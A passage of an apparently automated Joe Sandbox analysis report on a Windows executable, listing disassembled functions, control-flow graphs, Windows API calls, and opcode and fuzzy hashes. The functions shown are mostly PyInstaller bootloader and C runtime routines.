                                                                                      • Instruction Fuzzy Hash: AC216251B18A4291FBA0B764E8513B6F250BF88394FC00231E57DAA5D9EE2CE505C7A0
                                                                                      Function 00007FF7F3DEBA5C Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 691 7ff7f3deba5c-7ff7f3deba82 692 7ff7f3deba84-7ff7f3deba98 call 7ff7f3de4ee8 call 7ff7f3de4f08 691->692 693 7ff7f3deba9d-7ff7f3debaa1 691->693 707 7ff7f3debe8e 692->707 695 7ff7f3debe77-7ff7f3debe83 call 7ff7f3de4ee8 call 7ff7f3de4f08 693->695 696 7ff7f3debaa7-7ff7f3debaae 693->696 715 7ff7f3debe89 call 7ff7f3dea8e0 695->715 696->695 698 7ff7f3debab4-7ff7f3debae2 696->698 698->695 701 7ff7f3debae8-7ff7f3debaef 698->701 704 7ff7f3debaf1-7ff7f3debb03 call 7ff7f3de4ee8 call 7ff7f3de4f08 701->704 705 7ff7f3debb08-7ff7f3debb0b 701->705 704->715 710 7ff7f3debe73-7ff7f3debe75 705->710 711 7ff7f3debb11-7ff7f3debb17 705->711 713 7ff7f3debe91-7ff7f3debea8 707->713 710->713 711->710 712 7ff7f3debb1d-7ff7f3debb20 711->712 712->704 716 7ff7f3debb22-7ff7f3debb47 712->716 715->707 719 7ff7f3debb49-7ff7f3debb4b 716->719 720 7ff7f3debb7a-7ff7f3debb81 716->720 722 7ff7f3debb72-7ff7f3debb78 719->722 723 7ff7f3debb4d-7ff7f3debb54 719->723 724 7ff7f3debb56-7ff7f3debb6d call 7ff7f3de4ee8 call 7ff7f3de4f08 call 7ff7f3dea8e0 720->724 725 7ff7f3debb83-7ff7f3debbab call 7ff7f3ded5fc call 7ff7f3dea948 * 2 720->725 727 7ff7f3debbf8-7ff7f3debc0f 722->727 723->722 723->724 756 7ff7f3debd00 724->756 752 7ff7f3debbad-7ff7f3debbc3 call 7ff7f3de4f08 call 7ff7f3de4ee8 725->752 753 7ff7f3debbc8-7ff7f3debbf3 call 7ff7f3dec284 725->753 730 7ff7f3debc11-7ff7f3debc19 727->730 731 7ff7f3debc8a-7ff7f3debc94 call 7ff7f3df391c 727->731 730->731 736 7ff7f3debc1b-7ff7f3debc1d 730->736 744 7ff7f3debd1e 731->744 745 7ff7f3debc9a-7ff7f3debcaf 731->745 736->731 740 7ff7f3debc1f-7ff7f3debc35 736->740 740->731 741 7ff7f3debc37-7ff7f3debc43 740->741 741->731 746 7ff7f3debc45-7ff7f3debc47 741->746 748 7ff7f3debd23-7ff7f3debd43 ReadFile 744->748 745->744 750 7ff7f3debcb1-7ff7f3debcc3 GetConsoleMode 745->750 746->731 751 7ff7f3debc49-7ff7f3debc61 746->751 754 7ff7f3debe3d-7ff7f3debe46 GetLastError 748->754 755 7ff7f3debd49-7ff7f3debd51 748->755 750->744 757 7ff7f3debcc5-7ff7f3debccd 750->757 751->731 759 7ff7f3debc63-7ff7f3debc6f 751->759 752->756 753->727 764 7ff7f3debe63-7ff7f3debe66 754->764 765 7ff7f3debe48-7ff7f3debe5e call 7ff7f3de4f08 call 7ff7f3de4ee8 754->765 755->754 761 7ff7f3debd57 755->761 758 7ff7f3debd03-7ff7f3debd0d call 7ff7f3dea948 756->758 757->748 763 7ff7f3debccf-7ff7f3debcf1 ReadConsoleW 757->763 758->713 759->731 768 7ff7f3debc71-7ff7f3debc73 759->768 772 7ff7f3debd5e-7ff7f3debd73 761->772 774 7ff7f3debcf3 GetLastError 763->774 775 7ff7f3debd12-7ff7f3debd1c 763->775 769 7ff7f3debe6c-7ff7f3debe6e 764->769 770 7ff7f3debcf9-7ff7f3debcfb call 7ff7f3de4e7c 764->770 765->756 768->731 778 7ff7f3debc75-7ff7f3debc85 768->778 769->758 770->756 772->758 780 7ff7f3debd75-7ff7f3debd80 772->780 774->770 775->772 778->731 784 7ff7f3debd82-7ff7f3debd9b call 7ff7f3deb674 780->784 785 7ff7f3debda7-7ff7f3debdaf 780->785 793 7ff7f3debda0-7ff7f3debda2 784->793 788 7ff7f3debdb1-7ff7f3debdc3 785->788 789 7ff7f3debe2b-7ff7f3debe38 call 7ff7f3deb4b4 785->789 790 7ff7f3debdc5 788->790 791 7ff7f3debe1e-7ff7f3debe26 788->791 789->793 794 7ff7f3debdca-7ff7f3debdd1 790->794 791->758 793->758 796 7ff7f3debdd3-7ff7f3debdd7 794->796 797 7ff7f3debe0d-7ff7f3debe18 794->797 798 7ff7f3debdf3 796->798 799 7ff7f3debdd9-7ff7f3debde0 796->799 797->791 801 7ff7f3debdf9-7ff7f3debe09 798->801 799->798 800 7ff7f3debde2-7ff7f3debde6 799->800 800->798 802 7ff7f3debde8-7ff7f3debdf1 800->802 801->794 803 7ff7f3debe0b 801->803 802->801 803->791
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                      • String ID:
                                                                                      • API String ID: 3215553584-0
                                                                                      • Opcode ID: 1c0df5e74df0118619baac061aee596465bcef498cfc928fc9eaa168a483e3b3
                                                                                      • Instruction ID: 2ae60ac12aab64c9a0cb1b4a75a229ac41baac33c10c3e2c4ddd982db18a7b32
                                                                                      • Opcode Fuzzy Hash: 1c0df5e74df0118619baac061aee596465bcef498cfc928fc9eaa168a483e3b3
                                                                                      • Instruction Fuzzy Hash: EDC1092290D68741E7E96B9594402BDBF50FB81B80FD54231EE6E2B3D1CE7CF48587A2
                                                                                      Function 00007FF7F3DD8570 Relevance: 10.6, APIs: 7, Instructions: 63COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                      • String ID:
                                                                                      • API String ID: 995526605-0
                                                                                      • Opcode ID: fa90e23b90d603ff8a1fc3170628a297920662056bab6e12f28c88f429b12389
                                                                                      • Instruction ID: 39c2c2dd1efad5beee1ad3935f86356d63acf98b9d2b951d9ca8f070a925fc3f
                                                                                      • Opcode Fuzzy Hash: fa90e23b90d603ff8a1fc3170628a297920662056bab6e12f28c88f429b12389
                                                                                      • Instruction Fuzzy Hash: E4217531A0C64642EB90ABA5B48023AF3A0EF85BF0F940235EA7D5B7E8DE7CD4458750
                                                                                      Function 00007FF7F3DD90E0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                        • Part of subcall function 00007FF7F3DD8570: GetCurrentProcess.KERNEL32 ref: 00007FF7F3DD8590
                                                                                        • Part of subcall function 00007FF7F3DD8570: OpenProcessToken.ADVAPI32 ref: 00007FF7F3DD85A3
                                                                                        • Part of subcall function 00007FF7F3DD8570: GetTokenInformation.KERNELBASE ref: 00007FF7F3DD85C8
                                                                                        • Part of subcall function 00007FF7F3DD8570: GetLastError.KERNEL32 ref: 00007FF7F3DD85D2
                                                                                        • Part of subcall function 00007FF7F3DD8570: GetTokenInformation.KERNELBASE ref: 00007FF7F3DD8612
                                                                                        • Part of subcall function 00007FF7F3DD8570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7F3DD862E
                                                                                        • Part of subcall function 00007FF7F3DD8570: CloseHandle.KERNEL32 ref: 00007FF7F3DD8646
                                                                                      • LocalFree.KERNEL32(?,00007FF7F3DD3C55), ref: 00007FF7F3DD916C
                                                                                      • LocalFree.KERNEL32(?,00007FF7F3DD3C55), ref: 00007FF7F3DD9175
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                      • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                      • API String ID: 6828938-1529539262
                                                                                      • Opcode ID: 5ed7a9ba3e6ce910408607b93085540bd422a8d0f9e00f9f84049ca226c14b37
                                                                                      • Instruction ID: 5c559135aa7fa92dd1b9bc85adf760504fe181482b3f7e05a792f7f0c7c96ced
                                                                                      • Opcode Fuzzy Hash: 5ed7a9ba3e6ce910408607b93085540bd422a8d0f9e00f9f84049ca226c14b37
                                                                                      • Instruction Fuzzy Hash: A6215321A0874281F790BBA0E8552EAB361FF84780FC44135EA6D6B7D9DF3CE84587E0
                                                                                      Function 00007FF7F3DECF60 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 910 7ff7f3decf60-7ff7f3decf85 911 7ff7f3ded253 910->911 912 7ff7f3decf8b-7ff7f3decf8e 910->912 915 7ff7f3ded255-7ff7f3ded265 911->915 913 7ff7f3decf90-7ff7f3decfc2 call 7ff7f3dea814 912->913 914 7ff7f3decfc7-7ff7f3decff3 912->914 913->915 917 7ff7f3decff5-7ff7f3decffc 914->917 918 7ff7f3decffe-7ff7f3ded004 914->918 917->913 917->918 920 7ff7f3ded006-7ff7f3ded00f call 7ff7f3dec320 918->920 921 7ff7f3ded014-7ff7f3ded029 call 7ff7f3df391c 918->921 920->921 925 7ff7f3ded143-7ff7f3ded14c 921->925 926 7ff7f3ded02f-7ff7f3ded038 921->926 927 7ff7f3ded1a0-7ff7f3ded1c5 WriteFile 925->927 928 7ff7f3ded14e-7ff7f3ded154 925->928 926->925 929 7ff7f3ded03e-7ff7f3ded042 926->929 930 7ff7f3ded1d0 927->930 931 7ff7f3ded1c7-7ff7f3ded1cd GetLastError 927->931 932 7ff7f3ded156-7ff7f3ded159 928->932 933 7ff7f3ded18c-7ff7f3ded19e call 7ff7f3deca18 928->933 934 7ff7f3ded053-7ff7f3ded05e 929->934 935 7ff7f3ded044-7ff7f3ded04c call 7ff7f3de47c0 929->935 939 7ff7f3ded1d3 930->939 931->930 940 7ff7f3ded15b-7ff7f3ded15e 932->940 941 7ff7f3ded178-7ff7f3ded18a call 7ff7f3decc38 932->941 954 7ff7f3ded130-7ff7f3ded137 933->954 936 7ff7f3ded06f-7ff7f3ded084 GetConsoleMode 934->936 937 7ff7f3ded060-7ff7f3ded069 934->937 935->934 944 7ff7f3ded13c 936->944 945 7ff7f3ded08a-7ff7f3ded090 936->945 937->925 937->936 947 7ff7f3ded1d8 939->947 948 7ff7f3ded1e4-7ff7f3ded1ee 940->948 949 7ff7f3ded164-7ff7f3ded176 call 7ff7f3decb1c 940->949 941->954 944->925 952 7ff7f3ded096-7ff7f3ded099 945->952 953 7ff7f3ded119-7ff7f3ded12b call 7ff7f3dec5a0 945->953 955 7ff7f3ded1dd 947->955 956 7ff7f3ded1f0-7ff7f3ded1f5 948->956 957 7ff7f3ded24c-7ff7f3ded251 948->957 949->954 959 7ff7f3ded0a4-7ff7f3ded0b2 952->959 960 7ff7f3ded09b-7ff7f3ded09e 952->960 953->954 954->947 955->948 962 7ff7f3ded223-7ff7f3ded22d 956->962 963 7ff7f3ded1f7-7ff7f3ded1fa 956->963 957->915 967 7ff7f3ded0b4 959->967 968 7ff7f3ded110-7ff7f3ded114 959->968 960->955 960->959 965 7ff7f3ded234-7ff7f3ded243 962->965 966 7ff7f3ded22f-7ff7f3ded232 962->966 969 7ff7f3ded213-7ff7f3ded21e call 7ff7f3de4ec4 963->969 970 7ff7f3ded1fc-7ff7f3ded20b 963->970 965->957 966->911 966->965 972 7ff7f3ded0b8-7ff7f3ded0cf call 7ff7f3df39e8 967->972 968->939 969->962 970->969 976 7ff7f3ded0d1-7ff7f3ded0dd 972->976 977 7ff7f3ded107-7ff7f3ded10d GetLastError 972->977 978 7ff7f3ded0df-7ff7f3ded0f1 call 7ff7f3df39e8 976->978 979 7ff7f3ded0fc-7ff7f3ded103 976->979 977->968 978->977 983 7ff7f3ded0f3-7ff7f3ded0fa 978->983 979->968 980 7ff7f3ded105 979->980 980->972 983->979
                                                                                      APIs
                                                                                      • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F3DECF4B), ref: 00007FF7F3DED07C
                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F3DECF4B), ref: 00007FF7F3DED107
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ConsoleErrorLastMode
                                                                                      • String ID:
                                                                                      • API String ID: 953036326-0
                                                                                      • Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                      • Instruction ID: 5d4a17a707d31ee137a09be358ea6f9a4a5ced167c832bacbbe15f653786dc87
                                                                                      • Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                      • Instruction Fuzzy Hash: 7591C832E1865189F794AFA5944027DBFA0BB44B88F944239DE2E7B6C4CF38D486C771
                                                                                      Function 00007FF7F3DE5628 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                      • String ID:
                                                                                      • API String ID: 1279662727-0
                                                                                      • Opcode ID: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                                                      • Instruction ID: 714d68a3b1f627837104b0eeca460a53cc4737b17a2adef9702c5448021356c5
                                                                                      • Opcode Fuzzy Hash: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                                                      • Instruction Fuzzy Hash: C641DB22D1878283E398ABA09550379B761FB947A4F508334E67C17AD1DF7CE4E087A1
                                                                                      Function 00007FF7F3DDCC3C Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                      • String ID:
                                                                                      • API String ID: 3251591375-0
                                                                                      • Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                      • Instruction ID: 2d1483e0e7626e00bd2ea0e0d71504a7b278995b90a41101671c79cd4546b98d
                                                                                      • Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                      • Instruction Fuzzy Hash: 4E314E20E0914341FFD4BBF598513B9B6819F41788FC44134EA2E6F2DBDE2CA44A82F1
                                                                                      Function 00007FF7F3DE013C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                      • String ID:
                                                                                      • API String ID: 3215553584-0
                                                                                      • Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                      • Instruction ID: 6165f8212c5dfa928c3ec2d0f3d1e5d033899bd9e9cf81c847d43f4ef5a5fe5e
                                                                                      • Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                      • Instruction Fuzzy Hash: E251FC21B0924186E7ACBAE7940067AE991BF44BA4F884734DD7D6F7C5CE3CD481C6B2
                                                                                      Function 00007FF7F3DEC134 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFileLastPointer
                                                                                      • String ID:
                                                                                      • API String ID: 2976181284-0
                                                                                      • Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                      • Instruction ID: 5c76688e600b584057507513bfef81433e2cd7577ee3d0ae3c97f81b026e4a56
                                                                                      • Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                      • Instruction Fuzzy Hash: 8B110122B08B8281DBA4AB65A840169F761AB45FF0F944331EE7D1F7E8CE7CD0948781
                                                                                      Function 00007FF7F3DEA948 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RtlFreeHeap.NTDLL(?,?,?,00007FF7F3DF2D22,?,?,?,00007FF7F3DF2D5F,?,?,00000000,00007FF7F3DF3225,?,?,?,00007FF7F3DF3157), ref: 00007FF7F3DEA95E
                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF7F3DF2D22,?,?,?,00007FF7F3DF2D5F,?,?,00000000,00007FF7F3DF3225,?,?,?,00007FF7F3DF3157), ref: 00007FF7F3DEA968
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFreeHeapLast
                                                                                      • String ID:
                                                                                      • API String ID: 485612231-0
                                                                                      • Opcode ID: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                      • Instruction ID: cf2d705471936071a84183b19d9fe14e29fd9734a0b2c24156107a0782ec1dcb
                                                                                      • Opcode Fuzzy Hash: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                      • Instruction Fuzzy Hash: 0DE04F50E0920342FF8D7BF258951389A515F98B00FC40130D83D6E2D1DD2CA88183B1
                                                                                      Function 00007FF7F3DEAB58 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CloseHandle.KERNELBASE(?,?,?,00007FF7F3DEA9D5,?,?,00000000,00007FF7F3DEAA8A), ref: 00007FF7F3DEABC6
                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF7F3DEA9D5,?,?,00000000,00007FF7F3DEAA8A), ref: 00007FF7F3DEABD0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseErrorHandleLast
                                                                                      • String ID:
                                                                                      • API String ID: 918212764-0
                                                                                      • Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                      • Instruction ID: 9f08c8840a6c9606848a49971f907b8bca6f74ac38dad4e15623bbf5e44a626c
                                                                                      • Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                      • Instruction Fuzzy Hash: 0E21F610B1869341FBDD77E19480379AA929F84BA0F844339E93E6F7C1CE6CA4C143A2
                                                                                      Function 00007FF7F3DEBEAC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                      • String ID:
                                                                                      • API String ID: 3215553584-0
                                                                                      • Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                      • Instruction ID: 6b70df8f31d8af1651971ab991e3c8b8c6c7454f081e529a6d60c38adaf927b3
